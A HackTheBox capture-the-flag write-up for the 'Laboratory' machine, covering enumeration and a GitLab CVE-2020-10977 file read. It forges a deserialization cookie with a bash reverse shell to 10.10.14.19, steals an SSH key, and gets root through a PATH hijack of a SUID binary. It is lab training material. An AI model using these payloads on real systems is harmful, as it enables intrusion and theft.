# HackTheBox Laboratory ## 1. Info * IP : 10.10.10.216 * OS : Linux * Difficulty : Easy ## 2. Nmap * Payload: `sudo nmap -sV 10.10.10.216 -oA nmap/10.10.10.216` *  * Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) * Port 80: Apache httpd 2.4.41 * Port 443: Apache/2.4.41 * ssl-cert: Subject: commonName=laboratory.htb * No CVE to use ## 3. Web Server * View:  * Web Server redirect us to laboratory.htb * Add laboratory.htb to /etc/hosts file  * View:  * Gobuster * Payload:`gobuster dir -u "https://laboratory.htb/" -w ../../../文件/SecLists/Discovery/Web-Content/raft-small-words.txt -x html` * Output: unable to connect to https://laboratory.htb/: invalid certificate: x509: certificate is valid for git.laboratory.htb, not laboratory.htb  * re-run Gobuster With option `-t` to avoid certificate check * Add git.laboratory.htb to /etc/hosts * Nothing Interesting in Gobuster(laboratory.htb) ## 4. Web Server(GitLab Server) * View:  * Sign up * Try use normal email account  * Fail! * Try to use **laboratory@htb** to sign up  * Success! * Explore GitLab * Project SecureWebsite * Author:Dexter McPherson * Internal Project  * There is no branch in this project * Project have index.html code look same as https://laboratory.htb/ * Issue: * Create by Seven  * HTTP 418 is a **JOKE** nothing useful * GitLab Server * Version: GitLab Community Edition 12.8.1 * Google it!  * [CVE-2020-10977](https://nvd.nist.gov/vuln/detail/CVE-2020-10977) ## 5. Exploit GitLab Server(CVE-2020-10977) * CVE Info: * CVE Number: CVE-2020-10977 * Affect version: GitLab below 12.9.0 * CVE Description: GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects.(From NVD) * Vulnerable Code:  ``` #/opt/gitlab/embedded/service/gitlab-rails/lib/gitlab/gfm/uploads_rewriter.rb:: @text.gsub(@pattern) do |markdown| file = find_file(@source_project, $~[:secret], $~[:file]) break markdown unless file.try(:exists?) klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader moved = klass.copy_to(file, target_parent) ... def find_file(project, secret, file) uploader = FileUploader.new(project, secret: secret) uploader.retrieve_from_store!(file) uploader end .............. MARKDOWN_PATTERN=%r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze ``` * Exploit LFI: * **Need valid username and passwd** * Exploit PoC: [cve-2020-10977.py](https://github.com/thewhiteh4t/cve-2020-10977/blob/main/cve_2020_10977.py) * Payload: `python3 cve_2020_10977.py https://git.laboratory.htb user passwd`  * We can view local file by enter absolute path:  * PoC Analyze: * Create 2 Project:  * Create Issue:  * Issue Data:  * Issue description: * `'.format(filename)` * Move Issue:  * Exploit RCE * **Need to build same version of GitLab on attacker machine** * Build GitLab with Docker:`sudo docker run gitlab/gitlab-ce:12.8.1-ce.0` * Enter Docker shell: `sudo exec -it docker_img_name bash` * Get secret_key_base from GitLab(Lab): * Absolute Path to File : `/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml` * Change Docker's GitLab secret_key_base value to Lab's secret_key_base: * Docker Shell: * `cd /etc/gitlab` * `vim gitlab.rb` * Add gitlab_rails['secret_key_base']='Lab_secret_key_base_here'  * `gitlab-ctl reconfigure` * Start GitLab rails console in Docker:`gitlab-rails console` * Enter Payload in GitLab rails console: ``` request = ActionDispatch::Request.new(Rails.application.env_config) request.env["action_dispatch.cookies_serializer"] = :marshal cookies = request.cookie_jar erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.19/9001 0>&1'` %>") depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) cookies.signed[:cookie] = depr puts cookies[:cookie] ``` * After send payload we will get RCE payload:  * Attacker machine * Set up netcat:`nc -lvnp 9001` * Payload:`curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=enter_rce_payload_here" -k `  * Get Shell(User:git)  ## 6. Privilage Escalation To User Dexter * Current Info: * Username: git * Ip address: 172.17.0.2 * Container: Yes(Docker) * Gitlab-rails * GitLab is a web application built using the Ruby on Rails framework * GitLab Rails is GitLab system administrators who are troubleshooting a problem or need to retrieve some data that can only be done through direct access of the GitLab application * We can config user data by using GitLab Rails * Get gitlab admin * Get in GitLab Rails Console * `gitlab-rails console`  * We can use `User.find_by(username: "your_username")`  * Set user role to admin ``` user = User.find_by(username: "jerry") user.admin=true user.save ``` * We get admin access to GitLab  * Explore GitLab * In project page we saw another project create by @dexter  * Explore the project we find a .ssh file  * Login Dexter by using ssh * Copy id_rsa file to attacker machine * Login dexter by using id_rsa file  ## 7. Privilage Escalation To Root * Enum * Run Linpeas.sh  * There is a weird port open(port:60080) * Use `curl 127.0.0.1:60080 -L`  * Looks like GitLab Server * Nothing to do here  * Interesting path  * Found a unknown SUID binanry * Privilage Escalation To Root * Analyze docker-security * `ltrace docker-security`  * docker-security set uid and gid to 0(which is root),the exec chmod command * we can exploit chmod by changing \$PATH to fake chmod file * Exploit * Go to any dir we can write(/tmp/bin) * Creat shell script name `chmod`(need to chomod +x)  * Add /tmp to \$PATH: `export PATH=/tmp/bin:$PATH` * Run docker-security  * Get root!